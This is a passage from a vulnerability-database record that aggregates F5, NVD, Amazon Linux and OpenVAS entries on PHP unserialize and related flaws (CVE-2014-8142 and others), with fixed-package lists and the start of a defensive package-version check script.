{"f5": [{"lastseen": "2017-10-12T02:11:04", "bulletinFamily": "software", "description": " \n\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019. ([CVE-2014-8142](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142>))\n\nImpact \n\n\nNone. F5 products are not affected by this vulnerability. \n\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:20:00", "published": "2015-01-22T21:25:00", "href": "https://support.f5.com/csp/article/K16021", "id": "F5:K16021", "title": "PHP vulnerability CVE-2014-8142", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:09:56", "bulletinFamily": "software", "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": 
"2015-01-22T00:00:00", "published": "2015-01-22T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/000/sol16021.html", "id": "SOL16021", "title": "SOL16021 - PHP vulnerability CVE-2014-8142", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:10:02", "bulletinFamily": "software", "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2015-04-01T00:00:00", "published": "2015-04-01T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/300/sol16339.html", "id": "SOL16339", "title": "SOL16339 - Multiple PHP vulnerabilities CVE-2014-9425, CVE-2014-9426, CVE-2014-9427, CVE-2015-0231, and CVE-2015-0232", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2018-11-01T05:10:30", "bulletinFamily": "NVD", "description": "The deserialization code in PHP before 4.3.10 and PHP 5.x up to 5.0.2 allows remote attackers to cause a denial of service and execute arbitrary code via untrusted data to the unserialize function that may trigger \"information disclosure, double-free and negative reference index array underflow\" results.", "modified": "2018-10-30T12:25:35", "published": "2005-01-10T00:00:00", "id": "CVE-2004-1019", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1019", "title": "CVE-2004-1019", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-18T15:55:24", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in the process_nested_data 
function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019.", "modified": "2016-12-30T21:59:13", "published": "2014-12-20T06:59:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8142", "id": "CVE-2014-8142", "title": "CVE-2014-8142", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:08", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than [CVE-2004-1019 __](<https://access.redhat.com/security/cve/CVE-2004-1019>).\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php55-xmlrpc-5.5.20-2.94.amzn1.i686 \n php55-embedded-5.5.20-2.94.amzn1.i686 \n php55-dba-5.5.20-2.94.amzn1.i686 \n php55-pgsql-5.5.20-2.94.amzn1.i686 \n php55-gmp-5.5.20-2.94.amzn1.i686 \n php55-enchant-5.5.20-2.94.amzn1.i686 \n php55-soap-5.5.20-2.94.amzn1.i686 \n php55-mbstring-5.5.20-2.94.amzn1.i686 \n php55-ldap-5.5.20-2.94.amzn1.i686 \n php55-common-5.5.20-2.94.amzn1.i686 \n php55-intl-5.5.20-2.94.amzn1.i686 \n php55-imap-5.5.20-2.94.amzn1.i686 \n php55-pdo-5.5.20-2.94.amzn1.i686 \n php55-mysqlnd-5.5.20-2.94.amzn1.i686 \n php55-debuginfo-5.5.20-2.94.amzn1.i686 \n php55-pspell-5.5.20-2.94.amzn1.i686 \n 
php55-opcache-5.5.20-2.94.amzn1.i686 \n php55-gd-5.5.20-2.94.amzn1.i686 \n php55-recode-5.5.20-2.94.amzn1.i686 \n php55-process-5.5.20-2.94.amzn1.i686 \n php55-cli-5.5.20-2.94.amzn1.i686 \n php55-devel-5.5.20-2.94.amzn1.i686 \n php55-xml-5.5.20-2.94.amzn1.i686 \n php55-tidy-5.5.20-2.94.amzn1.i686 \n php55-mcrypt-5.5.20-2.94.amzn1.i686 \n php55-snmp-5.5.20-2.94.amzn1.i686 \n php55-mssql-5.5.20-2.94.amzn1.i686 \n php55-fpm-5.5.20-2.94.amzn1.i686 \n php55-odbc-5.5.20-2.94.amzn1.i686 \n php55-bcmath-5.5.20-2.94.amzn1.i686 \n php55-5.5.20-2.94.amzn1.i686 \n \n src: \n php55-5.5.20-2.94.amzn1.src \n \n x86_64: \n php55-process-5.5.20-2.94.amzn1.x86_64 \n php55-enchant-5.5.20-2.94.amzn1.x86_64 \n php55-xmlrpc-5.5.20-2.94.amzn1.x86_64 \n php55-pspell-5.5.20-2.94.amzn1.x86_64 \n php55-pdo-5.5.20-2.94.amzn1.x86_64 \n php55-pgsql-5.5.20-2.94.amzn1.x86_64 \n php55-fpm-5.5.20-2.94.amzn1.x86_64 \n php55-xml-5.5.20-2.94.amzn1.x86_64 \n php55-odbc-5.5.20-2.94.amzn1.x86_64 \n php55-cli-5.5.20-2.94.amzn1.x86_64 \n php55-tidy-5.5.20-2.94.amzn1.x86_64 \n php55-soap-5.5.20-2.94.amzn1.x86_64 \n php55-opcache-5.5.20-2.94.amzn1.x86_64 \n php55-snmp-5.5.20-2.94.amzn1.x86_64 \n php55-mysqlnd-5.5.20-2.94.amzn1.x86_64 \n php55-gd-5.5.20-2.94.amzn1.x86_64 \n php55-bcmath-5.5.20-2.94.amzn1.x86_64 \n php55-common-5.5.20-2.94.amzn1.x86_64 \n php55-devel-5.5.20-2.94.amzn1.x86_64 \n php55-recode-5.5.20-2.94.amzn1.x86_64 \n php55-mbstring-5.5.20-2.94.amzn1.x86_64 \n php55-gmp-5.5.20-2.94.amzn1.x86_64 \n php55-mcrypt-5.5.20-2.94.amzn1.x86_64 \n php55-intl-5.5.20-2.94.amzn1.x86_64 \n php55-dba-5.5.20-2.94.amzn1.x86_64 \n php55-ldap-5.5.20-2.94.amzn1.x86_64 \n php55-imap-5.5.20-2.94.amzn1.x86_64 \n php55-5.5.20-2.94.amzn1.x86_64 \n php55-debuginfo-5.5.20-2.94.amzn1.x86_64 \n php55-embedded-5.5.20-2.94.amzn1.x86_64 \n php55-mssql-5.5.20-2.94.amzn1.x86_64 \n \n \n", "modified": "2015-01-08T11:43:00", "published": "2015-01-08T11:43:00", "id": "ALAS-2015-464", "href": 
"https://alas.aws.amazon.com/ALAS-2015-464.html", "title": "Medium: php55", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T16:55:26", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than [CVE-2004-1019 __](<https://access.redhat.com/security/cve/CVE-2004-1019>).\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php54-bcmath-5.4.36-1.64.amzn1.i686 \n php54-odbc-5.4.36-1.64.amzn1.i686 \n php54-pdo-5.4.36-1.64.amzn1.i686 \n php54-mcrypt-5.4.36-1.64.amzn1.i686 \n php54-pspell-5.4.36-1.64.amzn1.i686 \n php54-snmp-5.4.36-1.64.amzn1.i686 \n php54-xmlrpc-5.4.36-1.64.amzn1.i686 \n php54-debuginfo-5.4.36-1.64.amzn1.i686 \n php54-common-5.4.36-1.64.amzn1.i686 \n php54-devel-5.4.36-1.64.amzn1.i686 \n php54-mssql-5.4.36-1.64.amzn1.i686 \n php54-embedded-5.4.36-1.64.amzn1.i686 \n php54-mbstring-5.4.36-1.64.amzn1.i686 \n php54-cli-5.4.36-1.64.amzn1.i686 \n php54-soap-5.4.36-1.64.amzn1.i686 \n php54-process-5.4.36-1.64.amzn1.i686 \n php54-mysql-5.4.36-1.64.amzn1.i686 \n php54-ldap-5.4.36-1.64.amzn1.i686 \n php54-mysqlnd-5.4.36-1.64.amzn1.i686 \n php54-tidy-5.4.36-1.64.amzn1.i686 \n php54-5.4.36-1.64.amzn1.i686 \n php54-gd-5.4.36-1.64.amzn1.i686 \n php54-xml-5.4.36-1.64.amzn1.i686 \n php54-pgsql-5.4.36-1.64.amzn1.i686 \n php54-recode-5.4.36-1.64.amzn1.i686 \n php54-intl-5.4.36-1.64.amzn1.i686 \n php54-dba-5.4.36-1.64.amzn1.i686 \n php54-enchant-5.4.36-1.64.amzn1.i686 \n 
php54-imap-5.4.36-1.64.amzn1.i686 \n php54-fpm-5.4.36-1.64.amzn1.i686 \n \n src: \n php54-5.4.36-1.64.amzn1.src \n \n x86_64: \n php54-enchant-5.4.36-1.64.amzn1.x86_64 \n php54-common-5.4.36-1.64.amzn1.x86_64 \n php54-embedded-5.4.36-1.64.amzn1.x86_64 \n php54-debuginfo-5.4.36-1.64.amzn1.x86_64 \n php54-xmlrpc-5.4.36-1.64.amzn1.x86_64 \n php54-process-5.4.36-1.64.amzn1.x86_64 \n php54-gd-5.4.36-1.64.amzn1.x86_64 \n php54-xml-5.4.36-1.64.amzn1.x86_64 \n php54-pdo-5.4.36-1.64.amzn1.x86_64 \n php54-5.4.36-1.64.amzn1.x86_64 \n php54-intl-5.4.36-1.64.amzn1.x86_64 \n php54-cli-5.4.36-1.64.amzn1.x86_64 \n php54-odbc-5.4.36-1.64.amzn1.x86_64 \n php54-mbstring-5.4.36-1.64.amzn1.x86_64 \n php54-imap-5.4.36-1.64.amzn1.x86_64 \n php54-mysql-5.4.36-1.64.amzn1.x86_64 \n php54-snmp-5.4.36-1.64.amzn1.x86_64 \n php54-pgsql-5.4.36-1.64.amzn1.x86_64 \n php54-mcrypt-5.4.36-1.64.amzn1.x86_64 \n php54-soap-5.4.36-1.64.amzn1.x86_64 \n php54-mysqlnd-5.4.36-1.64.amzn1.x86_64 \n php54-devel-5.4.36-1.64.amzn1.x86_64 \n php54-tidy-5.4.36-1.64.amzn1.x86_64 \n php54-pspell-5.4.36-1.64.amzn1.x86_64 \n php54-mssql-5.4.36-1.64.amzn1.x86_64 \n php54-bcmath-5.4.36-1.64.amzn1.x86_64 \n php54-recode-5.4.36-1.64.amzn1.x86_64 \n php54-fpm-5.4.36-1.64.amzn1.x86_64 \n php54-ldap-5.4.36-1.64.amzn1.x86_64 \n php54-dba-5.4.36-1.64.amzn1.x86_64 \n \n \n", "modified": "2015-01-08T11:43:00", "published": "2015-01-08T11:43:00", "id": "ALAS-2015-463", "href": "https://alas.aws.amazon.com/ALAS-2015-463.html", "title": "Medium: php54", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T16:55:20", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nsapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping's length during processing of an invalid file that begins with a # character and 
lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping. ([CVE-2014-9427](<https://access.redhat.com/security/cve/CVE-2014-9427>))\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for [CVE-2014-8142](<https://access.redhat.com/security/cve/CVE-2014-8142>). ([CVE-2015-0231](<https://access.redhat.com/security/cve/CVE-2015-0231>))\n\nThe exif_process_unicode function in ext/exif/exif.c in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free and application crash) via crafted EXIF data in a JPEG image. 
([CVE-2015-0232 __](<https://access.redhat.com/security/cve/CVE-2015-0232>))\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php54-snmp-5.4.37-1.65.amzn1.i686 \n php54-debuginfo-5.4.37-1.65.amzn1.i686 \n php54-pdo-5.4.37-1.65.amzn1.i686 \n php54-bcmath-5.4.37-1.65.amzn1.i686 \n php54-mbstring-5.4.37-1.65.amzn1.i686 \n php54-ldap-5.4.37-1.65.amzn1.i686 \n php54-pspell-5.4.37-1.65.amzn1.i686 \n php54-dba-5.4.37-1.65.amzn1.i686 \n php54-intl-5.4.37-1.65.amzn1.i686 \n php54-fpm-5.4.37-1.65.amzn1.i686 \n php54-process-5.4.37-1.65.amzn1.i686 \n php54-common-5.4.37-1.65.amzn1.i686 \n php54-mssql-5.4.37-1.65.amzn1.i686 \n php54-pgsql-5.4.37-1.65.amzn1.i686 \n php54-tidy-5.4.37-1.65.amzn1.i686 \n php54-recode-5.4.37-1.65.amzn1.i686 \n php54-odbc-5.4.37-1.65.amzn1.i686 \n php54-imap-5.4.37-1.65.amzn1.i686 \n php54-xml-5.4.37-1.65.amzn1.i686 \n php54-embedded-5.4.37-1.65.amzn1.i686 \n php54-enchant-5.4.37-1.65.amzn1.i686 \n php54-gd-5.4.37-1.65.amzn1.i686 \n php54-xmlrpc-5.4.37-1.65.amzn1.i686 \n php54-cli-5.4.37-1.65.amzn1.i686 \n php54-mysqlnd-5.4.37-1.65.amzn1.i686 \n php54-devel-5.4.37-1.65.amzn1.i686 \n php54-mysql-5.4.37-1.65.amzn1.i686 \n php54-soap-5.4.37-1.65.amzn1.i686 \n php54-5.4.37-1.65.amzn1.i686 \n php54-mcrypt-5.4.37-1.65.amzn1.i686 \n \n src: \n php54-5.4.37-1.65.amzn1.src \n \n x86_64: \n php54-5.4.37-1.65.amzn1.x86_64 \n php54-tidy-5.4.37-1.65.amzn1.x86_64 \n php54-intl-5.4.37-1.65.amzn1.x86_64 \n php54-pgsql-5.4.37-1.65.amzn1.x86_64 \n php54-mcrypt-5.4.37-1.65.amzn1.x86_64 \n php54-soap-5.4.37-1.65.amzn1.x86_64 \n php54-gd-5.4.37-1.65.amzn1.x86_64 \n php54-dba-5.4.37-1.65.amzn1.x86_64 \n php54-bcmath-5.4.37-1.65.amzn1.x86_64 \n php54-ldap-5.4.37-1.65.amzn1.x86_64 \n php54-mbstring-5.4.37-1.65.amzn1.x86_64 \n php54-devel-5.4.37-1.65.amzn1.x86_64 \n php54-snmp-5.4.37-1.65.amzn1.x86_64 \n php54-mysqlnd-5.4.37-1.65.amzn1.x86_64 \n 
php54-debuginfo-5.4.37-1.65.amzn1.x86_64 \n php54-enchant-5.4.37-1.65.amzn1.x86_64 \n php54-imap-5.4.37-1.65.amzn1.x86_64 \n php54-recode-5.4.37-1.65.amzn1.x86_64 \n php54-common-5.4.37-1.65.amzn1.x86_64 \n php54-mssql-5.4.37-1.65.amzn1.x86_64 \n php54-odbc-5.4.37-1.65.amzn1.x86_64 \n php54-mysql-5.4.37-1.65.amzn1.x86_64 \n php54-pspell-5.4.37-1.65.amzn1.x86_64 \n php54-pdo-5.4.37-1.65.amzn1.x86_64 \n php54-xmlrpc-5.4.37-1.65.amzn1.x86_64 \n php54-cli-5.4.37-1.65.amzn1.x86_64 \n php54-xml-5.4.37-1.65.amzn1.x86_64 \n php54-embedded-5.4.37-1.65.amzn1.x86_64 \n php54-process-5.4.37-1.65.amzn1.x86_64 \n php54-fpm-5.4.37-1.65.amzn1.x86_64 \n \n \n", "modified": "2015-02-11T19:46:00", "published": "2015-02-11T19:46:00", "id": "ALAS-2015-475", "href": "https://alas.aws.amazon.com/ALAS-2015-475.html", "title": "Medium: php54", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T16:55:16", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nsapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping's length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping. 
([CVE-2014-9427 __](<https://access.redhat.com/security/cve/CVE-2014-9427>))\n\nUse-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for [CVE-2014-8142 __](<https://access.redhat.com/security/cve/CVE-2014-8142>). ([CVE-2015-0231 __](<https://access.redhat.com/security/cve/CVE-2015-0231>))\n\nThe exif_process_unicode function in ext/exif/exif.c in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free and application crash) via crafted EXIF data in a JPEG image. ([CVE-2015-0232 __](<https://access.redhat.com/security/cve/CVE-2015-0232>))\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php55-embedded-5.5.21-1.96.amzn1.i686 \n php55-pspell-5.5.21-1.96.amzn1.i686 \n php55-mysqlnd-5.5.21-1.96.amzn1.i686 \n php55-imap-5.5.21-1.96.amzn1.i686 \n php55-dba-5.5.21-1.96.amzn1.i686 \n php55-xmlrpc-5.5.21-1.96.amzn1.i686 \n php55-xml-5.5.21-1.96.amzn1.i686 \n php55-odbc-5.5.21-1.96.amzn1.i686 \n php55-mbstring-5.5.21-1.96.amzn1.i686 \n php55-snmp-5.5.21-1.96.amzn1.i686 \n php55-tidy-5.5.21-1.96.amzn1.i686 \n php55-recode-5.5.21-1.96.amzn1.i686 \n php55-common-5.5.21-1.96.amzn1.i686 \n php55-opcache-5.5.21-1.96.amzn1.i686 \n php55-mcrypt-5.5.21-1.96.amzn1.i686 \n php55-debuginfo-5.5.21-1.96.amzn1.i686 \n php55-gmp-5.5.21-1.96.amzn1.i686 \n php55-fpm-5.5.21-1.96.amzn1.i686 \n php55-5.5.21-1.96.amzn1.i686 \n php55-pdo-5.5.21-1.96.amzn1.i686 \n php55-bcmath-5.5.21-1.96.amzn1.i686 \n 
php55-ldap-5.5.21-1.96.amzn1.i686 \n php55-process-5.5.21-1.96.amzn1.i686 \n php55-mssql-5.5.21-1.96.amzn1.i686 \n php55-enchant-5.5.21-1.96.amzn1.i686 \n php55-gd-5.5.21-1.96.amzn1.i686 \n php55-devel-5.5.21-1.96.amzn1.i686 \n php55-pgsql-5.5.21-1.96.amzn1.i686 \n php55-soap-5.5.21-1.96.amzn1.i686 \n php55-intl-5.5.21-1.96.amzn1.i686 \n php55-cli-5.5.21-1.96.amzn1.i686 \n \n src: \n php55-5.5.21-1.96.amzn1.src \n \n x86_64: \n php55-pgsql-5.5.21-1.96.amzn1.x86_64 \n php55-enchant-5.5.21-1.96.amzn1.x86_64 \n php55-gd-5.5.21-1.96.amzn1.x86_64 \n php55-pspell-5.5.21-1.96.amzn1.x86_64 \n php55-xmlrpc-5.5.21-1.96.amzn1.x86_64 \n php55-common-5.5.21-1.96.amzn1.x86_64 \n php55-mysqlnd-5.5.21-1.96.amzn1.x86_64 \n php55-bcmath-5.5.21-1.96.amzn1.x86_64 \n php55-ldap-5.5.21-1.96.amzn1.x86_64 \n php55-xml-5.5.21-1.96.amzn1.x86_64 \n php55-intl-5.5.21-1.96.amzn1.x86_64 \n php55-soap-5.5.21-1.96.amzn1.x86_64 \n php55-debuginfo-5.5.21-1.96.amzn1.x86_64 \n php55-opcache-5.5.21-1.96.amzn1.x86_64 \n php55-pdo-5.5.21-1.96.amzn1.x86_64 \n php55-mcrypt-5.5.21-1.96.amzn1.x86_64 \n php55-fpm-5.5.21-1.96.amzn1.x86_64 \n php55-mssql-5.5.21-1.96.amzn1.x86_64 \n php55-gmp-5.5.21-1.96.amzn1.x86_64 \n php55-cli-5.5.21-1.96.amzn1.x86_64 \n php55-odbc-5.5.21-1.96.amzn1.x86_64 \n php55-imap-5.5.21-1.96.amzn1.x86_64 \n php55-process-5.5.21-1.96.amzn1.x86_64 \n php55-5.5.21-1.96.amzn1.x86_64 \n php55-mbstring-5.5.21-1.96.amzn1.x86_64 \n php55-dba-5.5.21-1.96.amzn1.x86_64 \n php55-devel-5.5.21-1.96.amzn1.x86_64 \n php55-snmp-5.5.21-1.96.amzn1.x86_64 \n php55-recode-5.5.21-1.96.amzn1.x86_64 \n php55-embedded-5.5.21-1.96.amzn1.x86_64 \n php55-tidy-5.5.21-1.96.amzn1.x86_64 \n \n \n", "modified": "2015-02-11T19:46:00", "published": "2015-02-11T19:46:00", "id": "ALAS-2015-474", "href": "https://alas.aws.amazon.com/ALAS-2015-474.html", "title": "Medium: php55", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": 
"2018-10-02T14:31:34", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120454", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120454", "title": "Amazon Linux Local Check: alas-2015-463", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-463.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120454\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:44 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: alas-2015-463\");\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019 .\");\n script_tag(name:\"solution\", value:\"Run yum update php54 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-463.html\");\n script_cve_id(\"CVE-2014-8142\", \"CVE-2004-1019\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php54-bcmath\", rpm:\"php54-bcmath~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-odbc\", rpm:\"php54-odbc~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-pdo\", rpm:\"php54-pdo~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mcrypt\", rpm:\"php54-mcrypt~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-pspell\", rpm:\"php54-pspell~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-snmp\", rpm:\"php54-snmp~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-xmlrpc\", rpm:\"php54-xmlrpc~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-debuginfo\", rpm:\"php54-debuginfo~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-common\", rpm:\"php54-common~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-devel\", rpm:\"php54-devel~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-mssql\", rpm:\"php54-mssql~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php54-embedded\", rpm:\"php54-embedded~5.4.36~1.64.amzn1\", rls:\"AMAZON\")) != 
